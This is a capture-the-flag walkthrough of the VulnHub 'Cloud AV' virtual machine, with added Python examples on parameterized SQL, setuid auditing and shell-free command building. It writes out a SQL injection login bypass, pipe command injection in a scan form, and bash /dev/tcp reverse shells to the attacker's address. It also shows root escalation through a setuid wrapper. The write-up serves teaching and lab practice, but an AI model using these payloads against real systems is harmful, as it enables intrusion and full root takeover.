Download the target: https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
It is recommended to import the target into VirtualBox; pay attention to the following two settings:
VMSVGA
USB 1.1 (OHCI) controller
Network setup: https://www.cnblogs.com/shadow-/p/16815020.html
After completing the above, take a snapshot of both Kali and the target to record the current environment and configuration, so that a mistake during the exercise does not cause an irrecoverable loss.
Host discovery is usually done with the scanning tools in Kali: arp-scan, nmap, Fping, Nping, Arping, Nbtscan, ...
arp-scan is generally recommended because it is simple to use.
Run sudo arp-scan -l -I eth1
to look for the target; the target is found at 192.168.56.109
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1 127 ⨯
Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:4d:8e:be PCS Systemtechnik GmbH
192.168.56.109 08:00:27:17:f5:a8 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.201 seconds (116.31 hosts/sec). 3 responded
-I is the short form of --interface=; it specifies the interface to scan on. If it is omitted, eth0 is scanned by default.
-l (--localnet) scans the local network of that interface; you can of course also give the network range to scan directly.
Next, use nmap to port-scan the target. A classic nmap command, nmap -A -T4 192.168.56.109, is enough.
┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.109 1 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-23 14:29 CST
Nmap scan report for 192.168.56.109
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6a424b7c2a060f504b32cfb831e9c4f4 (RSA)
| 256 81c7600fd71e56f7a31e9f7627bd3127 (ECDSA)
|_ 256 7190c326ba3be8b3537e7353274d6baf (ED25519)
8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.83 seconds
The -A option performs OS and version detection.
The -T4 option speeds up execution.
From the scan results we obtain the following information: two ports are open, 22/tcp running OpenSSH 7.6p1 (Ubuntu) and 8080/tcp running an HTTP service on Werkzeug 0.14.1 with Python 2.7.15rc1.
There is no lead on SSH for now, so we can try the HTTP service the target exposes.
Visit http://192.168.56.109:8080/ in a browser. It is a plain web page; we can view its source in the browser.
<html>
<body>
<h1>Cloud Anti-Virus Scanner!</h1>
<h2>This is a beta Cloud Anti-Virus Scanner service.</h2>
<h3>Please enter your invite code to start testing</h3>
<form action="/login" method="POST">
<input type="text" name="password" placeholder="Invite Code">
<input type="submit" value="Log in">
</form>
</body>
</html>
From the /login form action we can roughly infer that the data submitted by this form is used to log in to the site. Having found a possible injection point in the page content, we can test it with sqlmap:
Open http://192.168.56.109:8080/ and press Ctrl + Shift + I to open the Web developer tools.
Set up interception for http://192.168.56.109:8080/login.
On http://192.168.56.109:8080/ submit the form above so that its POST request is captured, and save the raw request to a file (target.txt).
Run sqlmap -r target.txt -f --level 4 --risk 3
┌──(kali㉿kali)-[~/workspace]
└─$ sqlmap -r testsql.txt -f --level 4 --risk 3
___
__H__
___ ___[']_____ ___ ___ {1.6.10#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:18:43 /2022-10-23/
[15:18:43] [INFO] parsing HTTP request from 'testsql.txt'
[15:18:43] [INFO] testing connection to the target URL
[15:18:44] [INFO] testing if the target URL content is stable
[15:18:44] [INFO] target URL content is stable
[15:18:44] [INFO] testing if POST parameter 'password' is dynamic
[15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic
[15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[15:18:45] [INFO] testing for SQL injection on POST parameter 'password'
[15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y
[15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
[15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y
[15:19:14] [INFO] testing 'Generic inline queries'
[15:19:14] [INFO] testing 'SQLite inline queries'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
[15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
[15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
From this we can see that the injection type is OR boolean-based.
Construct the SQL injection string: knowing the injection type is OR boolean-based,
we can try the fairly generic string " or 1=1--
as the value of the password field of the form on http://192.168.56.109:8080/
and submit the form.
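The bypass that sqlmap reported and that the " or 1=1-- payload relies on only works because the login handler builds its SQL by pasting the submitted value into the query text. The following is an added example, not the CloudAV application's own code: a constructed in-memory SQLite table with one invite code, a lookup written the vulnerable way beside the parameterized form. The sample wraps the literal in single quotes, so the equivalent bypass payload here is ' or 1=1--; the table name, the column name and the invite code are all constructed for the demonstration.

```python
import sqlite3

# Constructed sample data: one valid invite code (not the real target's database).
VALID_INVITE = "secret-invite-code"


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database with a single invites table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE invites (code TEXT NOT NULL)")
    conn.execute("INSERT INTO invites (code) VALUES (?)", (VALID_INVITE,))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, password: str) -> bool:
    """The flawed pattern: the submitted value is pasted into the SQL text.

    A value such as  ' or 1=1--  turns the WHERE clause into
    code = '' or 1=1  followed by a comment, so every row matches.
    """
    query = "SELECT COUNT(*) FROM invites WHERE code = '%s'" % password
    (count,) = conn.execute(query).fetchone()
    return count > 0


def login_safe(conn: sqlite3.Connection, password: str) -> bool:
    """The fix: a bound parameter is always treated as data, never as SQL."""
    query = "SELECT COUNT(*) FROM invites WHERE code = ?"
    (count,) = conn.execute(query, (password,)).fetchone()
    return count > 0


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    for name, fn in (("vulnerable", login_vulnerable), ("safe", login_safe)):
        print(f"{name:10s} real code -> {fn(db, VALID_INVITE)}, "
              f"payload -> {fn(db, payload)}")
```

The parameterized version needs no escaping logic of its own: the database driver binds the value after the statement has been parsed, so the quote and the comment marker in the payload can never change the statement's structure.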
At this point we have successfully logged in to the http://192.168.56.109:8080/scan
page. A little exploration shows that this page is the back-end management page of the web application.
It contains a data-submission form, and from the phrase Try scanning some of these files with our scanner!
we learn that the submitted data is scanned by some program, which most likely involves execution in a shell.
<html>
<body>
<h1>Cloud Anti-Virus Scanner!</h1>
<h3>Try scanning some of these files with our scanner!</h3>
<pre>total 4756
-rwxr-xr-x 1 scanner scanner 1113504 Oct 21 2018 bash
-rwxr-xr-x 1 scanner scanner 34888 Oct 21 2018 bzip2
-rwxr-xr-x 1 scanner scanner 35064 Oct 21 2018 cat
-rw-rw-r-- 1 scanner scanner 68 Oct 21 2018 eicar
-rw-rw-r-- 1 scanner scanner 5 Oct 21 2018 hello
-rwxr-xr-x 1 scanner scanner 35312 Oct 21 2018 netcat
-rwxr-xr-x 1 scanner scanner 3633560 Oct 21 2018 python
</pre>
<form action="/output" method="POST">
<input type="filename" name="filename" placeholder="File Name">
<input type="submit" value="Scan!">
</form>
</body>
</html>
We can try using the | pipe to chain commands, changing the returned content and mixing in the information we want.
Submitting a | id
gives the result below, which shows that the input is not filtered and we can execute commands through it:
uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
Through this flaw we can build a | ls | grep 'xxxxx' | <command to run>
We can check whether wget exists,
which helps with uploading a payload and attacking with metasploit.
We can also use nc to get a reverse shell by running the commands below in order; the nc version on the target is not convenient for a reverse shell, so it can still be done with nc but is more cumbersome.
Upload a bash reverse-shell script with nc:
a | ls | grep 'xxxxx' | touch a.sh
a | ls | grep 'xxxxx' | nc -l -p 4444 -w6 > a.sh
nc 192.168.56.109 4444 < 'bash -i >& /dev/tcp/192.168.56.111/23333 0>&1'
netcat -lvp 23333
listens on the port; then a | ls | grep 'xxxxx' | bash a.sh
gives the reverse shell:
┌──(kali㉿kali)-[~/workspace]
└─$ netcat -lvp 23333
listening on [any] 23333 ...
192.168.56.109: inverse host lookup failed: Unknown host
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 52396
bash: cannot set terminal process group (694): Inappropriate ioctl for device
bash: no job control in this shell
scanner@cloudav:~/cloudav_app$ ls
ls
app.py
a.sh
database.sql
get-pip.py
get-pip.py.1
get-pip.py.2
get-pip.py.3
samples
templates
scanner@cloudav:~/cloudav_app$
In essence, the scanner user has a lot of room to act, and almost any method can break in [no other reverse-shell demonstrations are given here; look them up if needed].
We are now inside the target; let's explore the directories and files.
In the user's home directory we find a file with a special permission bit: -rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudav
scanner@cloudav:~$ ls -alh
ls -alh
total 60K
drwxr-xr-x 6 scanner scanner 4.0K Oct 24 2018 .
drwxr-xr-x 4 root root 4.0K Oct 21 2018 ..
-rw------- 1 scanner scanner 5 Oct 24 2018 .bash_history
-rw-r--r-- 1 scanner scanner 220 Oct 21 2018 .bash_logout
-rw-r--r-- 1 scanner scanner 3.7K Oct 21 2018 .bashrc
drwx------ 2 scanner scanner 4.0K Oct 21 2018 .cache
drwxrwxr-x 4 scanner scanner 4.0K Oct 23 10:59 cloudav_app
drwx------ 3 scanner scanner 4.0K Oct 21 2018 .gnupg
drwxrwxr-x 3 scanner scanner 4.0K Oct 21 2018 .local
-rw-r--r-- 1 scanner scanner 807 Oct 21 2018 .profile
-rw-rw-r-- 1 scanner scanner 66 Oct 21 2018 .selected_editor
-rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudav
-rw-rw-r-- 1 scanner scanner 393 Oct 24 2018 update_cloudav.c
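The listing above shows update_cloudav owned by root with the s bit set and executable by the scanner user, which is exactly the kind of file a privilege audit should surface. As an added example (not part of the original write-up), the script below walks a directory tree and reports every regular file with the setuid or setgid bit, recording the owner and whether the file is also group- or world-writable (a far worse misconfiguration than the s bit alone). Because it cannot see the target, it builds a constructed temporary tree with a placeholder update_cloudav to demonstrate on; the tree layout and file contents are constructed.

```python
import os
import stat
import tempfile
from dataclasses import dataclass
from typing import List


@dataclass
class PrivilegedFile:
    path: str
    uid: int
    setuid: bool
    setgid: bool
    writable_by_others: bool  # group- or world-writable: worse than the s bit alone


def find_privileged_files(root: str) -> List[PrivilegedFile]:
    """Walk root and return every regular file with the setuid or setgid bit set.

    This is the check that finds entries like
    -rwsr-xr-x 1 root scanner ... update_cloudav  in a home directory.
    """
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, sockets, devices
            suid = bool(st.st_mode & stat.S_ISUID)
            sgid = bool(st.st_mode & stat.S_ISGID)
            if suid or sgid:
                writable = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
                found.append(PrivilegedFile(path, st.st_uid, suid, sgid, writable))
    return sorted(found, key=lambda f: f.path)


def build_demo_tree() -> str:
    """Constructed sample tree (not the target): one setuid file, one normal file."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    home = os.path.join(root, "home", "scanner")
    os.makedirs(home)
    normal = os.path.join(home, "update_cloudav.c")
    with open(normal, "w") as fh:
        fh.write("/* source file, no privileges */\n")
    os.chmod(normal, 0o664)
    suid = os.path.join(home, "update_cloudav")
    with open(suid, "wb") as fh:
        fh.write(b"placeholder, not a real binary\n")
    os.chmod(suid, 0o4755)  # rwsr-xr-x, as in the listing
    return root


if __name__ == "__main__":
    tree = build_demo_tree()
    for f in find_privileged_files(tree):
        bits = ("setuid " if f.setuid else "") + ("setgid" if f.setgid else "")
        print(f"{f.path}: {bits.strip()} uid={f.uid} writable_by_others={f.writable_by_others}")
```

On a real host you would point find_privileged_files at / (or at /home, where a custom helper like this one is most likely to hide) and compare the result against the set of setuid binaries the distribution ships, so that anything the package manager does not account for stands out.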
-s is the setuid permission bit: when the program runs, the process (and any child it spawns) inherits the privileges of the file's owner, here root, instead of the caller's. The s bit is a sensitive permission bit and easily causes security problems for the system.
The source next to it, update_cloudav.c:
#include <stdio.h>
#include <stdlib.h>   /* malloc, system */
#include <string.h>   /* strlen */
#include <unistd.h>   /* setgid, setuid */
int main(int argc, char *argv[])
{
    char *freshclam="/usr/bin/freshclam";
    if (argc < 2){
        printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n");
        return 1;
    }
    /* argv[1] is pasted into a shell command string without any validation */
    char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);
    sprintf(command, "%s %s", freshclam, argv[1]);
    /* the binary is setuid root, so the shell below runs as root */
    setgid(0);
    setuid(0);
    system(command);
    return 0;
}
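Both flaws on this box come from the same mistake: the scan form that accepted a | id and the update_cloudav wrapper that concatenates argv[1] with sprintf and hands it to system() both let a user-controlled string reach /bin/sh. The example below is added here and is not the CloudAV application's or the wrapper's code. It contrasts the single shell string with an argument vector, and shows a hardened scan-command builder that validates the file name against the samples directory and returns an argv list for subprocess with no shell, so a | in the input stays a literal character. The scanner path /usr/bin/clamscan and the samples directory are assumptions (the write-up only says "some program" scans the file); the sample files are constructed.

```python
import os
import re
import subprocess
import tempfile
from typing import List

# Assumed scanner binary; the write-up does not name the program the form invokes.
SCANNER = "/usr/bin/clamscan"
# Only plain names such as "eicar" or "bash" are accepted: no paths, no metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def shell_command_for(filename: str) -> str:
    """The flawed approach (what 'a | id' exploits): one string handed to /bin/sh.

    The returned string is what the shell would parse; a '|' in filename
    becomes a pipeline, exactly as argv[1] does in update_cloudav.c.
    """
    return "%s %s" % (SCANNER, filename)


def build_scan_argv(filename: str, samples_dir: str) -> List[str]:
    """Hardened: validate the name, resolve it inside samples_dir, return an argv list."""
    if not SAFE_NAME.match(filename):
        raise ValueError("rejected file name: %r" % filename)
    samples_root = os.path.realpath(samples_dir)
    target = os.path.realpath(os.path.join(samples_root, filename))
    # realpath defeats symlink tricks; the directory check keeps us inside samples_dir
    if os.path.dirname(target) != samples_root or not os.path.isfile(target):
        raise ValueError("not a scannable sample: %r" % filename)
    # each element goes to execve as-is; no shell ever re-parses this list
    return [SCANNER, target]


def run_scan(argv: List[str]) -> subprocess.CompletedProcess:
    """Run without a shell: the list form never re-parses its arguments."""
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=60)


def build_demo_samples() -> str:
    """Constructed samples directory standing in for ~/cloudav_app/samples."""
    d = tempfile.mkdtemp(prefix="samples-")
    for name in ("eicar", "hello"):
        with open(os.path.join(d, name), "w") as fh:
            fh.write("constructed sample\n")
    return d


if __name__ == "__main__":
    samples = build_demo_samples()
    print("shell string:", shell_command_for("a | id"))        # a pipeline, not a file name
    print("argv        :", build_scan_argv("eicar", samples))  # a list, no shell involved
    for bad in ("a | id", "../etc/passwd", "missing"):
        try:
            build_scan_argv(bad, samples)
        except ValueError as exc:
            print("rejected    :", exc)
```

The same argv-list rule is the fix for the setuid wrapper: an execv()-style call with a fixed program path and the user's option as one separate array element gives freshclam the argument verbatim, whereas system() asks a shell to interpret it first. Dropping the setuid bit in favour of a sudoers rule restricted to freshclam would remove the root-as-a-side-effect entirely.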
Getting root privileges:
netcat -lvp 4444
listens on port 4444; then, on the target, run touch b.sh && echo 'bash -i >& /dev/tcp/192.168.56.111/4444 0>&1' > b.sh && ./update_cloudav "a | ls | grep 'xxxxx' | bash b.sh"
┌──(kali㉿kali)-[~]
└─$ netcat -lvp 4444
listening on [any] 4444 ...
192.168.56.109: inverse host lookup failed: Unknown host
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 56672
bash: cannot set terminal process group (694): Inappropriate ioctl for device
bash: no job control in this shell
root@cloudav:~# id
id
uid=0(root) gid=0(root) groups=0(root),1001(scanner)
Game over: GAMEOVER